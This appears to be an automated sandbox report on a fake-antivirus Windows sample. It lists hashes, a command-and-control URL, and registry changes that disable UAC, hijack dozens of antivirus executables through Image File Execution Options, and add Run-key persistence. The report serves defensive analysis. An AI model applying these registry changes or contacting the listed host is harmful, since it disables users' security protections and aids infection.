Analysis
-
max time kernel
150s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
31/10/2024, 05:06
Static task
static1
Behavioral task
behavioral1
Sample
81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe
Resource
win10v2004-20241007-en
General
-
Target
81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe
-
Size
2.0MB
-
MD5
81bc906307d99bcb8b3aeaceb1d51b5c
-
SHA1
9dfd66539c689b2ecaf46fdcdeebf00128e59f87
-
SHA256
191f71d0ce6906e90271c1a713d6420759744e21455818a244f4331f38e16b08
-
SHA512
2d1912e20c73da05e6e5ff9373620ce829647fe23c92e54b20cac74453967831b89c9b00451938fbc3b9497f16b716e756f63540929b342de4d8cec05e5eb3f5
-
SSDEEP
49152:r5cOFNA7o0BM4wpDnqrYTHJ0I24oS6HGpwlSGnf:r5vNOoLpVuI21S6HGuR
Malware Config
Extracted
http://galaint.onlinesecstats.info/?0=155&1=1&2=1&3=54&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=tmikvgppmh&14=1
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-cphn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-cphn.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-cphn.exe -
Disables taskbar notifications via registry modification
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmsgri32.exe Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msvxd.exe Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PsImSvc.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tvtmd.exe\Debugger = "svchost.exe" Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbwin9x.exe\Debugger = "svchost.exe" Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\alogserv.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ants.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\windows Police Pro.exe\Debugger = "svchost.exe" Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netinfo.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\serv95.exe Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vscenu6.02d30.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\alevir.exe\Debugger = "svchost.exe" Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fih32.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fnrb32.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsma32.exe Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\JsRcGen.exe Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mrflux.exe Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\npssvc.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntivirusXP\Debugger = "svchost.exe" Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\brw.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchostc.exe Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winactive.exe Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcupdate.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\neomonitor.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\beagle.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dvp95.exe\Debugger = "svchost.exe" Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsav95.exe\Debugger = "svchost.exe" Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lnetinfo.exe\Debugger = "svchost.exe" Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nwtool16.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wupdater.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVCare.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgctrl.exe Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netmon.exe Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\prmvr.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tca.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashSimp2.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgw.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswRegSvr.exe Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfd.exe Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmon016.exe Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netutils.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vettray.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscfxav.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MalwareRemoval.exe\Debugger = "svchost.exe" Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antivirusxppro2009.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sc.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\belt.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fch32.exe Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\firewall.exe Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fixfp.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nui.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\personalguard.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\signcheck.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vswinperse.exe Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antivirusxppro2009.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dllreg.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVWEBGRD.EXE Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cleanIELow.exe\Debugger = "svchost.exe" Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cssupdat.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\webdav.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wimmun32.exe\Debugger = "svchost.exe" Protector-cphn.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lucomserver.exe Protector-cphn.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avmcdlg.exe\Debugger = "svchost.exe" Protector-cphn.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation 81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation dvj45s81vl7c89u.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation 56m04a7z799e88f.exe -
Executes dropped EXE 3 IoCs
pid Process 4492 dvj45s81vl7c89u.exe 3764 56m04a7z799e88f.exe 2776 Protector-cphn.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-cphn.exe" Protector-cphn.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-cphn.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\services.msc Protector-cphn.exe File opened for modification C:\Windows\SysWOW64\eventvwr.msc Protector-cphn.exe File opened for modification C:\Windows\SysWOW64\diskmgmt.msc Protector-cphn.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1476 sc.exe 1528 sc.exe 4080 sc.exe 780 sc.exe 2900 sc.exe 3564 sc.exe 2268 sc.exe 1464 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 15 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 81bc906307d99bcb8b3aeaceb1d51b5c_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Protector-cphn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 56m04a7z799e88f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dvj45s81vl7c89u.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{E9BEAA60-9745-11EF-BDBF-4A034D48373C} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 702820bf522bdb01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31140690" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31140690" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1" Protector-cphn.exe Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3192493666" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437116175" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 80fc18bf522bdb01 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000013dbeb74f69550459d232b3693c378ca000000000200000000001066000000010000200000001e2c830cc4003afc945a40fb9bea89897772c71535671078aa07f0b2c2854008000000000e80000000020000200000002cd119bfa40e4dec180355990b8297d2084f7dac45f6b2e2e42cd83d47895b7a20000000c2cfe00fd66053b9f423c70ee1a9c476dd36f85ec5dd1a9c568152ec1de028cd400000006a0e32a146a8e1a5b442e3722966ff1649297b1fa6bae68609cea8e78a85369832886e808037a67648feca1845e03f61bfb902af5f3d8660eaa5ccaee77a10a9 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3191243263" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3192493666" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31140690" IEXPLORE.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312 Protector-cphn.exe Set value (data) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3191243263" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31140690" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000013dbeb74f69550459d232b3693c378ca0000000002000000000010660000000100002000000063a7059ba8c2a8311f0cab0aac09ce30f96088761523aed9368f5a7f7443d73c000000000e8000000002000020000000ac6863a2b68c1ef6b99d1cabe9b3c679c2fa210b60db568f9ce0e3d8d63699ba2000000071b187c2eff2d97bed4d252cb9d3daf6321c586b9d065e5ed63fefe1fdcb24344000000025f068a37d012ca30dc999034a67d7959eee431c4c809d5505814f19524e20207d1d4a768e3c4acbc4fb117b3c4aa3ea43b1e5365741d060c915cc4ae8e42403 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe -
Modifies registry class 35 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\VersionIndependentProgID\ = "WbemScripting.SWbemNamedValueSet" 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\ = "Viviki.Adajo" 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\ProgID\ 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\Programmable\ 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win32\ 56m04a7z799e88f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\InProcServer32 56m04a7z799e88f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\ProgID 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\ 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\FLAGS\ 56m04a7z799e88f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\Programmable 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\ 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\FLAGS\ = "0" 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\VersionIndependentProgID\ 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\InProcServer32\ 56m04a7z799e88f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win64 56m04a7z799e88f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\Version 56m04a7z799e88f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55} 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\InProcServer32\ = "%SystemRoot%\\SysWow64\\wbem\\wbemdisp.dll" 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\ = "MTS 2.0 Admin Type Library" 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\TypeLib\ = "{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}" 56m04a7z799e88f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\FLAGS 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\ 56m04a7z799e88f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0 56m04a7z799e88f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win32 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win64\ = "C:\\Windows\\SysWow64\\Com\\mtsadmin.tlb" 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9A8B544C-FE00-48E5-EE90-DD9BC4630D55}\ProgID\ = "WbemScripting.SWbemNamedValueSet.1" 56m04a7z799e88f.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0 56m04a7z799e88f.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{ABD569BC-978A-E4EC-23AC-8FA5F9A66FBA}\1.0\0\win64\ 56m04a7z799e88f.exe 